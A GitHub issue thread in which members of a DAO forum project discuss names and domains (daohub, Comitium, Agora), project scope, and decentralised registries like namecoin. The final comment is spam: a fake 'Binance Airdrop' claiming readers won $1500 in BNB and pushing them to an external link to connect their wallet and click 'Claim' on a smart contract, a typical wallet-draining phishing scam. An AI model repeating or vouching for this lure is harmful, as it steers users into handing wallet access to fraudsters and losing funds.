### ISSUE TITLE
Domain Name Ideas

### ISSUE THREAD

**Issue by auryn-macmillan** [auryn-macmillan/DAOForum#7]
**Throw your ideas in the pot for potential names and domain names**

**Comment by auryn-macmillan** [comment]
Current suggestions from Slack:
- Already owned by a community member and available for use:
  - DAOTalk.io
  - DAOTalk.com
  - EthDAO.io
  - SlockitDAO.com
  - SlockDAO.com
  - iotDAO.com
- Not currently owned by a community member:
  - DAOhub.tld
  - DAO.tld

**Comment by ghost** [comment]
The eventual domain name is dependent on what the scope of DAOforum is.

If we're building a forum specifically for the governance of the slock.it DAO (or whatever that'll eventually be named, probably something cool) then iotDAO and SlockitDAO both work well. 

If the end-goal is to build a service for eventual use by ALL DAOs, then we gotta keep it general. DAOtalk is good, albeit ripped from bitcointalk. However if this turns into a fully fledged product I think it deserves a proper name w/o mention of DAO. Might be too grandiose, but I know that in the Roman republic the building that housed a lot of political and judiciary activity was named the Comitium (https://en.wikipedia.org/wiki/Comitium ). Comitium is a fun name. 

So yeah, we have a few options, but it all depends on the project scope.

**Comment by CaptainSkywave** [comment]
should be a domain making sense also in small font, like: daotalk or talkdao
..or does that matter..?

**Comment by FelixA** [comment]
I would like to propose another solution: As far as I imagine the DAO its purpose at least in the near future will be to fund new service providers using blockchain technology its name could also be the fundingdao which makes its purpose a little bit clearer.
The forum could then be fundingtalk, fundingDAOtalk or something like this.
Yet I also really like Comitium - sounds fancy

**Comment by auryn-macmillan** [comment]
My personal favourite is **daohub**. I think it fits well with the current scope, but does not limit the future scope to only the slock.it dao, nor to simply being a forum (it could evolve into much more later in its life cycle). It has a broad potential scope, is not so broad that it is irrelevant to the current scope, and is not so abstract as to require wikipedia to figure out what it means. I like the idea of comitium, it's unique and has a cool meaning. But also has undertones of the current state of politics/governance, or at least it's origins, so may not necessarily be aligned with the such a radical new approach to governance. Although at least the Athenian version of democracy was a direct democracy similar to the DAO, so I guess it could be viewed as a digital throwback.

**Comment by CaptainSkywave** [comment]
I like daohub too!

**Comment by CaptainSkywave** [comment]
daohq ?

**Comment by FelixA** [comment]
Actually the more I think about it, the more I like the reference to the early Athenian direct democracy. So I would like to propose Agora - the place where councils have been held. Later they where held in the Pnyx, but speaking this word out loud, kind of sounds like a sickness to me

**Comment by vmichalik** [comment]
I thought someone ran a vote for this on Slack?

**Comment by auryn-macmillan** [comment]
yeah we ran a quick vote on the domain names which had already been purchased, but no general call for name ideas.

**Comment by auryn-macmillan** [comment]
I like the idea of Agora, but it is already the name of a Darknet market. Also SEO would be tougher with a word that already exists.

**Comment by ghost** [comment]
Agora would be wonderful if it wasn't a DNM. That's also a very good point about the SEO, in which case I think daohub is an excellent choice.

**Comment by FelixA** [comment]
Yeah, of course I don't want to have the domain name associated with a darknet market. In that case I would also vote for daohub. btw. even if it is extremely unlikely, do you guys know if there is a website or programm that checks if a word is an insult in some language? More out of curiosity than for this particular case :)

**Comment by auryn-macmillan** [comment]
Have never heard of  anything like that, would be cool though.

**Comment by auryn-macmillan** [comment]
I went ahead and purchased daohub.org

**Comment by CaptainSkywave** [comment]
I have bought daoteam.org if that would be useful..

**Comment by auryn-macmillan** [comment]
@CaptainSkywave great! I'm sure that will be a useful domain name to have at some point.

**Comment by byrnenick** [comment]
A bit late to the conversation - I don't mind daohub.org or daoteam.com - but...

+1 to @cjharty 's point. I feel like we might not be thinking big enough here. Or maybe I'm missing some context? The use of DAO in the word helps bring in early adopters, but may then limit the audience down the track.

 Depends on DAO vs generic movement. I own TypeHuman.com - I've always pictured that being a neat domain for an human-operating system of sorts. Certainly not trying to push typehuman.com on the team - just using this as an example. Keen to learn more about the context here so I might be able to offer better input.

**Comment by CaptainSkywave** [comment]
@schmico just to clarify, I bought daoteam.org (as DAO is an org) not daoteam.com
..but anyway, a domain is just a minor topic - the bigger topic is to create and make the basis for the organisation

**Comment by auryn-macmillan** [comment]
@schmico: re: scope - we had a some pretty in depth discussions on slack which were summarised in this thread pretty well. I think thus far it seems we're all in agreeance that we'd like the initial scope of the project to essentially be a forum catering to the communication & governance needs of the slock.it DAO. In the medium term, we would like for it to be a generic platform for the communication & governance needs of any and every DAO. And in the long term I see it basically the go to resource for anything DAO related; news, educational resources, forums, podcasts, all that good stuff. Beyond that, I don't see an issue expanding the scope further, and I like where you going with it being geared towards human organisation in general. Perhaps it can evidentially become a website geared towards anything to do with humans collectively self-organising (DOAs and blockchains being just one of a host of tools to help enable that effort). One of the things that I find most appealing about blockchain tech, and Ethereum in particular, is the potential it affords us to re-imagine the ways in which we organise and govern ourselves on a wide scale and across the arbitrary lines we draw in the dirt that we call nations. I think the name daohub still fits that late stage scope quite well, but we could always look for a rebrand if we come up with something more fitting down the road.

**Comment by byrnenick** [comment]
Thanks for clarifying @auryn-macmillan - sounds great :+1:

**Comment by matrixator** [comment]
It would be cool if the domain would also belong to a decentralized system... Let's hope we'll have one in Ethereum universe.

**Comment by auryn-macmillan** [comment]
yeah, if an ethereum based name registry pops up, we'll try to scoop up all the daobub domains.

**Comment by FelixA** [comment]
There actually is a company - based on the bitcoin blockchain: **https://namecoin.info/** 
you can get .bit addresses here and I don't think it's hard to copy this on ethereum with .eth addresses or sth. similar.
Yet these solutions have a huge disadvantage: They're not directly available since all usual domains are controlled by the ICANN. So you either have to use a proxy or to change the DNS in your settings. Maybe some more elegant solution will come, but so far I guess it will be sufficient to use ICANN controlled domains

**Comment by auryn-macmillan** [comment]
Yeah namecoin is very cool, there's lots of malicious domain name squatting going on though. I think for now, relying on ICANN domains is fine. But the goal should be to slowly migrate to decentralised services (or at least offer them in parallel) in the long term.

**Comment by vmichalik** [comment]
In my mind, super long term as ICANN are one of the only similar types of bodies anywhere on the Internet who are actually doing an okay job

**Comment by auryn-macmillan** [comment]
Yeah, realistically I think adding decentralised options in parallel is the best solution. Giving people the option to find it both ways. Similar to how facebook has a .onion address.

**Comment by prezo-ci-bkp** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @
